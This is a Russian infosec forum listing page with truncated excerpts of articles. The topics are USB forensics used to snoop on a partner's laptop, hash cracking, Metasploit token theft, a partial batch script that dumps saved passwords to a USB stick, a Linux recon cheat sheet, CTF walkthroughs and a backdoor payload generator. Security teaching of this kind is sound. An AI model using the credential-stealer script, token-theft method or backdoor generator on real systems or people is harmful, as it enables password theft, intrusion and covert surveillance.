Форум информационной безопасности - Codeby.net

Статья usbrip: USB-форензика для Линуксов, или Как Алиса стала Евой

  • 21 978
  • 26
Недавно стал сторонним наблюдателем душераздирающей драмы, поводом для которой послужило, увы, мое пристрастие к распутыванию различного рода загадок и головоломок.

Краткий очерк того, что здесь будет происходить (дабы незаинтересованные сразу могли покинуть тред): около 2-х недель назад ко мне обратился знакомый (далее "Боб") с просьбой о помощи в доказательстве факта измены своей подруги (далее "Алиса"), апеллируя к тому, что "ты ж программист". Согласен, довольно необычный аргумент в такой ситуации, но технари же всесильны, разве нет ;)? Конечно, я согласился, ибо предстояло интересное расследование компьютерной активности в поисках аномальных следов любовника на ноутбуке подруги друга (заковыристо!), что обещало хоть как-то разбавить мои серые буди. В этой статье поговорим об опенсорсной утилите usbrip, написанной энтузиастом-соотечественником (насколько я могу судить по профилю на Гитхабе) для мониторинга истории USB-подключений под Линуксами, моем опыте ее использования и применения к "боевым" задачам.

Предыстория событий

Явился ко мне, значит, Боб...

Hash-Buster v2.0 - Поиск хэша

  • 6 935
  • 1
68747470733a2f2f696d6167652e6962622e636f2f6e474e76736f2f53637265656e73686f745f66726f6d5f323031385f30365f30345f32305f31385f30302e706e67

Всем привет, сегодня я вам покажу инструмент Hash-Buster, который расшифровывает хэши.


Особенности инструмента

  • Автоматическая идентификация типа хэша.
  • Поддержка MD5, SHA1, SHA2.
  • Может извлекать хэши из файла.
  • Может рекурсивно находить хэши из каталога.
  • 6 надежных API.
Установка

Качать тут:
Код:
https://github.com/s0md3v/Hash-Buster
Выдаем права:
Код:
chmod +x hash.py
Функционал

Крекинг одного хэша:

Крекинг хэшей из файла :
орпл2.png


Поиск хэшей из каталога :
2018-06-12_12-28-07.png


Демонстрация

Попробуем расшифровать хэши:
2018-06-12_12-33-53.png
2018-06-12_12-38-16.png

На этом все) Спасибо за внимание.

Архивная Пост эксплуатация скомпроментированных Windows систем. Metasploit Incognito

  • 5 391
  • 13
Актуальная версия на 2025 год: Metasploit: повышение привилегий через кражу токенов

Всем посетителям форума, доброго времени дня. Сегодня я решил осветить один из встроенных модулей в metasploit framework, о котором мало кто знает и мало кто пользуется, но на самом деле данный модуль позволяет поднять свои привилегии вплоть до администратора домена или предприятия в зависимости от того, как повезет. Для этого данный модуль использует такой тип данных как shell token. Token это своеобразный временный ключ, который позволит получить доступ к системе и сети без необходимости каждый раз вводить учётные данные. То есть при входе администратора на сервер или ПК в системе создается токен с его учетными данными и именно его мы будем пытаться эксплуатировать.

Итак начнем. Поискав в своей корпоративной сети, я для наглядности остановил свой выбор на ПК под управлением WinXP с ip адресом 10.1.134.17. Для начала скомпрометируем систему, используя всем известный ms08_netapi. В качестве атакуещего хоста Kali 2017.3.
Посмотреть вложение 14680

Получив активную...

Статья Создаем USB stealer паролей (для начинающих)

  • 45 700
  • 47
Приветсвую!
Мой первый пост, так что не судите строго :)
В этой статье, уважаемый %username%, ты научишься создать свою собственную usb-флешку, для быстрого бэкапа (кражи) паролей с нужной для тебя рабочей станции.

Что же нам для этого надо:
1) usb флюшка
2) продукты от Nirsoft'a, которые можно скачать бесплатно с офф. сайта nirsoft:
  • MessenPass
  • Mail PassView
  • Protected Storage PassView
  • Dialupass
  • BulletsPassView
  • Network Password Recovery
  • SniffPass Password Sniffer
  • RouterPassView
  • PstPassword
  • WebBrowserPassView
  • WirelessKeyView
  • Remote Desktop PassView
  • VNCPassView
После того, как вы скачали вышеуказанный софт, его следует перенести на сам флеш-диск.

3) Открываем блокнот, после чего вставляем в него следующее содержимое:

Код:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt<br>start pspv.exe /stext pspv.txt
start Dialupass.exe /stext Dialupass.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start netpass.exe /stext netpass.txt
start sniffpass.exe /stext sniffpass.txt
start RouterPassView.exe...

Статья [Шпаргалка] Разведка и аудит сервера

  • 43 676
  • 26
Всем привет! Решил поделиться с Вами списком полезных, как я считаю, команд для Linux систем со стороны аналитика.
Возможно, пригодятся тем, кто начинает осваивать CTF.
А так же, не будут лишними, что бы иметь их под рукой, проводя аудит реальной системы.

Теперь по порядку:

Операционная система.

Определение версии и типа дистрибутива:

Код:
cat /etc/issue
cat /etc/*-release
lsb_release -a
cat /etc/lsb-release         # Debian based
cat /etc/redhat-release      # Redhat based

1527891432493.png


Определение версии ядра и разрядности системы:

Код:
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-

1527891519392.png


Информация о переменных окружения:

Код:
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

1527891558533.png


Приложения и сервисы.

Список запущенных сервисов. Сервисы, запущенные от привилегированных пользователей:

Код:
ps aux
ps -ef
top                         #htop
cat...

Конкурс Лучшие темы codeby по версии Valkiria.

  • 8 743
  • 8
V
Статья для участия в конкурсе: Конкурс - Золотые темы или ТОП 20 codeby

Форум изобилует авторскими статьями и выбрать лучшие - задача архи-сложная. Представленный ниже список статей - всего лишь мой субъективный взгляд. При оценке статей я делала акцент не только на "научную" составляющую, но и искусство автора владения русским языком, умение красиво и грамотно донести мысль до читателя.

На мой взгляд, "золотые" статьи должны читаться на одном дыхании, вызывать у читателя послевкусие, пробуждаьть воображение.
Кроме того, они должны быть доступны для понимания широкому кругу читателей, несмотря на узкую специальность форума.
Считаю, что авторы представленных ниже статей достигли оптимального соотношения "научность-доступность-актуальность".

Начну со статей от пользователя z3r0c10wn.
Автор: @z3r0c10wn

CTF CTF: Hack The Bulldog VM

  • 7 714
  • 12
Привет, Codeby! В этот раз я предлагаю рассмотреть методы решения, в рамках CTF, уязвимой VM Bulldog (Boot2Root Challenge)

Скачиваем Bulldog тут

Атакующая ОС: Kali Linux 2018.2

Импортируем и запускаем (при запуске, VM сообщает, какой адрес получила по DHCP) затем ищем, где запущен web сервер у VM:

1527712421288.png


Код:
nmap –sV –A 192.168.0.110

1527712445012.png


Переходим на web Bulldog:

1527712462738.png


Тут, ничего, заслуживающего внимания я не нашел, подключаем nikto для более подробного анализа сервера:

Код:
nikto –h 192.168.0.110

1527712489880.png


Nikto нашел интересную директорию, зайдем осмотреться:

1527712509386.png


Тут интересен вход в Web Shell, но он доступен аутентифицированным пользователям:

1527712530846.png


И список, тех, с кем можно на эту тему поговорить, этим мы заниматься не будем, а заглянем в исходный код страницы:

1527712542041.png


Отлично, это похоже на хэши паролей, проверим тип одного из этих хэшей:

Код:
hash-identifier
...

Статья Terminator - генератор Payloads для Metasploit

  • 8 222
  • 9
Добрый день,Уважаемые Форумчане,Друзья и те,кто следит за пульсом ИБ.
Хочу порадовать форум сегодня новинкой,которая генерирует различные backdoor.
Автора этого замечательного генератора зовут Mohamed Nour.

Помогать мне сегодня будут сделать обзор дистрибутивы ArchStrike и BlackArch.
Простите за дерзость,но продемонстрирую вам атаку на BlackArch Linux.
Нашей задачей будет получение оболочки атакуемой машины.
Для этого Terminator продуман для работы с Metasploit.

Администрация ресурса и автор обзора предупреждают о запрете использования рассматриваемого
инструмента в незаконных целях.Вся информация предоставлена исключительно для ознакомления.


Установим Terminator:
Код:
# git clone https://github.com/MohamedNourTN/Terminator.git
# cd Terminator/
# chmod +x terminator.py
# python2 terminator.py -Запуск на Arch Linux
# python terminator.py -Запуск на Debian Linux

Нас встретит интерфейс с меню,которое представлено выбором следующих задач:
Binaries Payloads

1) Android
2) Windows
3) Linux
4) Mac OS

Scripting Payloads

1) Python
2) Perl
3) Bash

Web Payloads

1) ASP
2) JSP
3) War

Encrypters

1) APK...

Статья Samurai Email Discovery: утилита для поиска email-адресов

  • 9 235
  • 7
1527511340003.png


🛡️ Samurai Email Discovery: найдите email-адреса эффективно и быстро!

Исследуете открытые источники или проводите анализ данных? Samurai Email Discovery – простой Bash-фреймворк, созданный для поиска email-адресов по доменам, компаниям и через Google Dork. Узнайте, как быстро освоить этот инструмент.

Мы покажем, как установить и использовать Samurai Email Discovery, чтобы начать сбор информации. Несмотря на свою простоту, утилита предлагает базовые возможности для OSINT. Узнайте, стоит ли она вашего внимания среди других решений.

💡 Для всех, кто ищет простой инструмент для сбора публичных email-адресов и интересуется OSINT-методами.

CTF CTF. Hack The Dina 1.0

  • 13 382
  • 28
Всем привет! Появилась недавно идея совместного прохождения CTF с модератором @gx6060, буду выкладывать наши варианты прохождения, от простых к сложным с описанием техник. Я уже делал подобные обзоры в одиночку, но две головы интереснее.

Взяли несложную Dina 1.0.

Для начала, как обычно немного разведки:

Код:
netdiscover

1527510802301.png


Dina обнаружилась в сети под адресом 192.168.0.107, далее nmap:

Код:
nmap –sV –A 192.168.0.107

1527510852600.png


Среди всей информации, интерес представляет директория /nothing, так как, при просмотре исходного кода мы находим список паролей:

1527510867065.png


Ну и конечно, необходимо подключить nikto, т.к. больше ничего интересного не нашлось.

Код:
nikto –h 192.168.0.107

1527510900817.png


Директория /secure содержит запароленный архив с бэкапом, нетрудно догадаться, что правильным будет один из паролей в найденном ранее списке.

Содержимое архива – это файл MP3 который таковым не является, смотрим на него через notepad++ к примеру.

1527510914002.png


Переходим по ссылке, нас встречает сервис...
🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

Статистика форума

Темы
50 949
Сообщения
344 696
Пользователи
148 465
Новый пользователь
RTF_LABS_STUDIO